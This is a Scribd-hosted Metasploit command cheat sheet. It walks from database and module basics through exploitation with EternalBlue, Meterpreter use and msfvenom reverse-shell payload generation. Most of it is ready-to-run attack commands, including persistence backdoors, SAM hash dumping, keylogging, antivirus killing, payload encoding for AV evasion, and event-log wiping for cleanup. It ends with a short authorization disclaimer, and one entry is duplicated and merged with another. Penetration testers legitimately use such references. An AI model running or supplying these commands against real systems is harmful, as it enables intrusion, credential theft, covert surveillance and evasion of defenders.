KEMBAR78
Metasploit Command Cheat Sheet | PDF | Software | Computing
Scribd
Upload
83 views8 pages

Metasploit Command Cheat Sheet

This document is a comprehensive cheat sheet for Metasploit commands, covering topics from database management to advanced operations. It includes examples for each command, such as initializing the database, running exploits, managing sessions, and generating payloads. Additionally, it provides pro tips for stealth, persistence, and cleanup while emphasizing the importance of obtaining authorization before testing.

Uploaded by

Emmanuel Syavugha
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
83 views8 pages

Metasploit Command Cheat Sheet

This document is a comprehensive cheat sheet for Metasploit commands, covering topics from database management to advanced operations. It includes examples for each command, such as initializing the database, running exploits, managing sessions, and generating payloads. Additionally, it provides pro tips for stealth, persistence, and cleanup while emphasizing the importance of obtaining authorization before testing.

Uploaded by

Emmanuel Syavugha
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 8

Metasploit Command Cheat Sheet: Basic to Advanced

Command | Explanation | Example

By STR4NG3R
Discord : darkode_44

I. DATABASE & WORKSPACE MANAGEMENT

1.​ msfdb init

Initialize Metasploit database


Example: msfdb init

2.​ msfdb run

Start Metasploit with database


Example: msfdb run

3.​ workspace

List/switch workspaces
Example:

workspace # List workspaces


workspace -a Internal_Net # Create new workspace
workspace Corporate # Switch workspace

4.​ db_nmap

Run Nmap and save results to DB


Example: db_nmap -sV -O 192.168.1.0/24
II. MODULE OPERATIONS

5.​ search

Find modules by type/name/CVE


Example:

search type:exploit eternalblue


search cve:2019-0708
search platform:windows smb

6.​ use

Select a module
Example: use exploit/windows/smb/ms17_010_eternalblue

7.​ show options

View required/settings for current module


Example: show options

8.​ set / setg

Configure option (setg = global)


Example:

set RHOSTS 10.0.0.5


setg LHOST eth0 # Use interface name
setg LHOST 192.168.1.5

9.​ show payloads

List compatible payloads for exploit


Example: show payloads
III. EXPLOITATION

10.​run / exploit

Execute the module


Example:

exploit # Run foreground


exploit -j # Run as background job
run # For auxiliary modules

11.​check

Test vulnerability without exploitation


Example: check

12.​sessions

Manage active shells


Example:

sessions -l # List sessions


sessions -i 3 # Interact with session 3
sessions -k 2 # Kill session 2

IV. METERPRETER ESSENTIALS

13.​sysinfo

Get target system details


Example: sysinfo

14.​getuid

Show current user privileges


Example: getuid
15.​shell

Spawn OS command shell


Example: shell

16.​upload / download

Transfer files
Example:

upload /root/tools/nc.exe C:\\Windows\\Temp


download "C:\\Documents\\passwords.txt"

17.​ps

List running processes


Example: ps

18.​migrate

Move to a stable process


Example: migrate 2484 (PID of explorer.exe)

19.​getsystem

Attempt privilege escalation


Example: getsystem

V. POST-EXPLOITATION

20.​run post/multi/manage/autoroute

Add pivot route through session


Example: run post/multi/manage/autoroute SUBNET=192.168.2.0/24
21.​portfwd

Create port forward


Example:

portfwd add -l 3306 -p 3306 -r 172.16.0.20


# Access target DB via localhost:3306

22.​run persistence

Install backdoor
Example:
run persistence -U -i 60 -p 4444 -r 10.0.0.3
# -U: User login trigger, -i: reconnect interval

23.​run persistence -U -i 60 -p 4444 -r 10.0.0.3


# -U: User login trigger, -i: reconnect interval
run post/windows/gather/hashdump

Dump SAM hashes


Example: run post/windows/gather/hashdump

24.​run post/multi/recon/local_exploit_suggester

Find local privilege escalations


Example: run post/multi/recon/local_exploit_suggester

VI. PAYLOAD GENERATION (MSFVENOM)

25.​Windows Reverse Shell

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=443 -f exe >


payload.exe
26.​Linux Payload

msfvenom -p linux/x86/shell_reverse_tcp LHOST=IP LPORT=53 -f elf > payload.elf

27.​AV Evasion

msfvenom -p windows/meterpreter/reverse_https LHOST=IP -e x86/shikata_ga_nai -i 5 -f exe


> payload.exe

28.​Web Payloads

# PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST=IP -f raw > shell.php
# ASPX:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP -f aspx > shell.aspx

VII. ADVANCED OPERATIONS

29.​resource

Execute command script


Example:

echo "use auxiliary/scanner/http/title" > scan.rc


echo "set RHOSTS 10.0.0.0/24" >> scan.rc
echo "run" >> scan.rc
msfconsole -r scan.rc

30.​load

Add plugins (e.g., AutoAddRoute)


Example: load auto_add_route
31.​set AutoRunScript

Automate post-exploit tasks


Example:

set AutoRunScript "migrate -n explorer.exe -k"


# Auto-migrate on session start

32.​db_export

Export data for reporting


Example: db_export -f xml /root/scan_report.xml

VIII. KEY METERPRETER TRICKS

33.​Screenshots

use post/windows/capture/screen
set SESSION 1
run

34.​Keylogger

keyscan_start # Start capturing keystrokes


keyscan_dump # Show captured keys
keyscan_stop # Stop keylogger

35.​Disable Antivirus

run post/windows/manage/killav

36.​Pivoting Scan

use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.2.0/24
set PORTS 445,3389
run
PRO TIPS:

Stealth: Always use reverse_https payloads over TCP (encrypted + blends with web traffic).

Persistence: Combine persistence with migrate for reliable backdoors.

Cleanup: clearev wipes event logs; rm deletes uploaded tools.

Upgrade Shells: Use sessions -u <ID> to upgrade basic shell to Meterpreter.

🔥
Always obtain authorization before testing. Unauthorized access is illegal.
Master these commands → Become a Metasploit Ninja!

You might also like